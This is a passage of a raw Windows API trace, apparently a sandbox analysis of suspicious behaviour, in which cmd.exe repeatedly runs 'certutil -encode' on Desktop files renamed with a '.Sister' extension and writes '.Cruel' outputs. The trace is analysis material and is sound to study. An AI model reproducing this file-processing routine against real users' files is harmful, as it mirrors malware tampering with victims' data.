[0207.018] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0207.018] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0207.018] GetProcessHeap () returned 0x21ed8c70000 [0207.018] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7bd50 [0207.018] ??_V@YAXPEAX@Z () returned 0x1 [0207.018] ??_V@YAXPEAX@Z () returned 0x1 [0207.018] GetProcessHeap () returned 0x21ed8c70000 [0207.018] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d56240, Size=0x270) returned 0x21ed8d56240 [0207.018] GetProcessHeap () returned 0x21ed8c70000 [0207.018] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d56240) returned 0x270 [0207.018] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0207.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.019] GetFileType (hFile=0x50) returned 0x2 [0207.019] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0207.019] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0207.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.020] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0207.026] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0207.026] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0207.026] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0207.026] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0207.026] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.026] GetFileType (hFile=0x50) returned 0x2 [0207.026] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0207.026] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0207.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.027] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0207.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.027] GetFileType (hFile=0x50) returned 0x2 [0207.027] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0207.027] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0207.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.028] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d561e0*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d561e0*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0207.028] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"23wggka_3I9jMmhYgMoj.jpg.Sister\" \"23wggka_3I9jMmhYgMoj.jpg.Cruel\" ") returned 76 [0207.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.028] GetFileType (hFile=0x50) returned 0x2 [0207.028] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0207.029] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0207.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.029] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x4c, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x4c) returned 1 [0207.029] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0207.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.029] GetFileType (hFile=0x50) returned 0x2 [0207.029] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0207.030] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0207.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.030] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0207.035] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0207.035] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0207.035] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0207.036] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0207.036] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0207.036] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0207.036] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0207.036] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0207.036] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0207.036] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0207.036] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0207.036] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0207.036] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0207.036] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0207.036] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0207.036] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0207.036] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0207.036] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0207.036] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0207.036] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0207.036] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0207.036] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0207.036] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0207.036] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0207.036] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0207.036] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0207.036] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0207.036] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0207.036] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0207.036] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0207.037] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0207.037] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0207.037] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0207.037] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0207.037] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0207.037] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0207.037] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0207.037] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0207.037] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0207.037] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0207.037] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0207.037] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0207.037] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0207.037] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0207.037] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0207.037] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0207.037] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0207.037] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0207.037] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0207.037] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0207.037] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0207.037] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0207.037] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0207.037] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0207.037] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0207.037] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0207.037] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0207.037] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0207.037] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0207.037] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0207.038] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0207.038] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0207.038] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0207.038] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0207.038] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0207.038] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0207.038] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0207.038] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0207.038] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0207.038] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0207.038] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0207.038] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0207.038] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0207.038] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0207.038] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0207.038] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0207.038] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0207.038] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0207.038] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0207.038] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0207.038] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0207.038] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0207.038] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0207.038] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0207.038] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0207.038] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0207.038] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0207.038] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0207.038] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0207.038] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0207.039] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0207.039] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0207.039] ??_V@YAXPEAX@Z () returned 0x1 [0207.039] GetProcessHeap () returned 0x21ed8c70000 [0207.039] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93800f0 [0207.039] GetProcessHeap () returned 0x21ed8c70000 [0207.039] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xba) returned 0x21ed92a03f0 [0207.039] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0207.039] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0207.039] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0207.039] GetProcessHeap () returned 0x21ed8c70000 [0207.039] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed93900e0 [0207.040] SetErrorMode (uMode=0x0) returned 0x0 [0207.040] SetErrorMode (uMode=0x1) returned 0x0 [0207.040] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed93900f0, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0207.041] SetErrorMode (uMode=0x0) returned 0x1 [0207.041] GetProcessHeap () returned 0x21ed8c70000 [0207.041] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93900e0, Size=0x52) returned 0x21ed93900e0 [0207.041] GetProcessHeap () returned 0x21ed8c70000 [0207.041] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93900e0) returned 0x52 [0207.041] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0207.041] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0207.041] GetProcessHeap () returned 0x21ed8c70000 [0207.041] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed8d65170 [0207.041] GetProcessHeap () returned 0x21ed8c70000 [0207.041] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed8d63450 [0207.041] GetProcessHeap () returned 0x21ed8c70000 [0207.041] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d63450, Size=0x1be) returned 0x21ed8d63450 [0207.041] GetProcessHeap () returned 0x21ed8c70000 [0207.041] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d63450) returned 0x1be [0207.041] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.041] GetProcessHeap () returned 0x21ed8c70000 [0207.041] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c75a10 [0207.041] GetProcessHeap () returned 0x21ed8c70000 [0207.041] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c75a10, Size=0x7e) returned 0x21ed8c75a10 [0207.042] GetProcessHeap () returned 0x21ed8c70000 [0207.042] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c75a10) returned 0x7e [0207.042] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.042] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0207.042] GetLastError () returned 0x2 [0207.042] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.042] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0207.042] GetLastError () returned 0x2 [0207.043] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.043] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7d060 [0207.043] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0207.043] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0207.043] GetLastError () returned 0x2 [0207.043] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cbe0 [0207.044] FindClose (in: hFindFile=0x21ed8c7cbe0 | out: hFindFile=0x21ed8c7cbe0) returned 1 [0207.044] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0207.044] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0207.044] ??_V@YAXPEAX@Z () returned 0x1 [0207.044] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0207.045] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0207.045] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0207.045] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0207.046] GetProcessHeap () returned 0x21ed8c70000 [0207.046] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45da0 [0207.046] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0207.046] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0207.046] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0207.046] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0207.046] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0207.046] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0207.046] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0207.046] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0207.046] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0207.046] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0207.046] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0207.046] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0207.046] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0207.046] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0207.046] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0207.046] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0207.046] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0207.046] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0207.046] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0207.046] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0207.046] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0207.046] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0207.046] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0207.046] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0207.046] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0207.047] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0207.047] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0207.047] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0207.047] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0207.047] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0207.047] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0207.047] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0207.047] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0207.047] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0207.047] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0207.047] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0207.047] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0207.047] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0207.047] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0207.047] GetProcessHeap () returned 0x21ed8c70000 [0207.047] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45da0) returned 1 [0207.047] GetProcessHeap () returned 0x21ed8c70000 [0207.047] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95800 [0207.047] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0207.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.047] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0207.048] _get_osfhandle (_FileHandle=0) returned 0x4c [0207.048] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0207.048] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"23wggka_3I9jMmhYgMoj.jpg.Sister\" \"23wggka_3I9jMmhYgMoj.jpg.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"23wggka_3I9jMmhYgMoj.jpg.Sister\" \"23wggka_3I9jMmhYgMoj.jpg.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"23wggka_3I9jMmhYgMoj.jpg.Sister\" \"23wggka_3I9jMmhYgMoj.jpg.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x50c, dwThreadId=0xff8)) returned 1 [0207.058] CloseHandle (hObject=0xa4) returned 1 [0207.058] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0207.058] GetProcessHeap () returned 0x21ed8c70000 [0207.058] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d44660) returned 1 [0207.059] GetEnvironmentStringsW () returned 0x21ed9980080* [0207.059] GetProcessHeap () returned 0x21ed8c70000 [0207.059] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d44660 [0207.059] FreeEnvironmentStringsA (penv="=") returned 1 [0207.059] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0209.905] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0209.905] CloseHandle (hObject=0xa8) returned 1 [0209.905] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0209.905] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0209.906] GetProcessHeap () returned 0x21ed8c70000 [0209.906] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d44660) returned 1 [0209.906] GetEnvironmentStringsW () returned 0x21ed9980080* [0209.906] GetProcessHeap () returned 0x21ed8c70000 [0209.906] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d44660 [0209.906] FreeEnvironmentStringsA (penv="=") returned 1 [0209.906] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0209.906] GetProcessHeap () returned 0x21ed8c70000 [0209.906] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d44660) returned 1 [0209.906] GetEnvironmentStringsW () returned 0x21ed9980080* [0209.907] GetProcessHeap () returned 0x21ed8c70000 [0209.907] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d44660 [0209.907] FreeEnvironmentStringsA (penv="=") returned 1 [0209.907] GetProcessHeap () returned 0x21ed8c70000 [0209.907] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95800) returned 1 [0209.907] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0209.907] ??_V@YAXPEAX@Z () returned 0x1 [0209.907] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45c39890, ftCreationTime.dwHighDateTime=0x1d5ec46, ftLastAccessTime.dwLowDateTime=0x4e3ff9f0, ftLastAccessTime.dwHighDateTime=0x1d5e58e, ftLastWriteTime.dwLowDateTime=0x4e3ff9f0, ftLastWriteTime.dwHighDateTime=0x1d5e58e, nFileSizeHigh=0x0, nFileSizeLow=0x9873, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="2QVQiUvIc2zuhpxx-t.mp4.Sister", cAlternateFileName="")) returned 1 [0209.907] GetProcessHeap () returned 0x21ed8c70000 [0209.907] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c75930, Size=0x106) returned 0x21ed8c95c40 [0209.907] GetProcessHeap () returned 0x21ed8c70000 [0209.907] RtlSizeHeap 